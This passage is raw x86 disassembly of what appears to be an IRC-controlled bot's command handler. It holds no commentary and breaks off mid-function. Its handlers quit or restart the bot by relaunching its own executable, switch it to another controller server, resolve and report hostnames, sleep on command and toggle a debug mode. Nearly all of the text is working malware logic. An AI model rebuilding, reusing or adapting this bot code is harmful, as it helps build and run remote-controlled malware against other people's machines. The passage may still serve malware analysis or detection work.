pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41EC40
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EB2C
push offset dword_41EC40
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41EF48
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41EF48
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EB2C
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DAB4
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DE30
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41ED48
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41ED48
push offset dword_41DAB4
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DE30
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp dword_41DE38, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov dword_41DE38, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and dword_41DE38, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call dword_41DE8C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
